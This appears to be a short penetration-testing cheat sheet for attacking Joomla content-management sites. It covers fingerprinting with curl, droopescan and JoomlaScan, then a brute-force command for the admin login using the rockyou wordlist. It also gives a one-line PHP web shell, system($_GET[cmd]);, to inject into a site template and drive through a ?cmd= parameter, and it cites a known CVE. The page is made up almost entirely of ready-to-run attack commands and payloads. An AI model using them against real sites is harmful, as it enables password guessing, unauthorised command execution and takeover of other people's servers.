Joomla
Introduction
Enumeration
Footprinting:
curl -s http://<url> | grep JoomlaAutomated Scan:
droopescan:
droopescan scan joomla --url http://<url>JoomlaScan:
Requires Python 2.7 to run
sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4python2.7 joomlascan.py -u http://<url>Attacking Joomla
Login Bruteforce:
There is no default password. Can only bruteforce for weak / common password: ajnik/joomla-bruteforce: Joomla login bruteforce (github.com)
sudo python3 joomla-brute.py -u http://<url> -w /usr/share/wordlists/rockyou.txt -usr adminCode Execution:
Requires Admin access. Inject this into a template (on the bottom left under Configuration)
system($_GET[cmd]);Then visit the php page with
?cmd=<command>
Known Vulnerabilities:
Version 3.9.4 - CVE-2019-10945
Last updated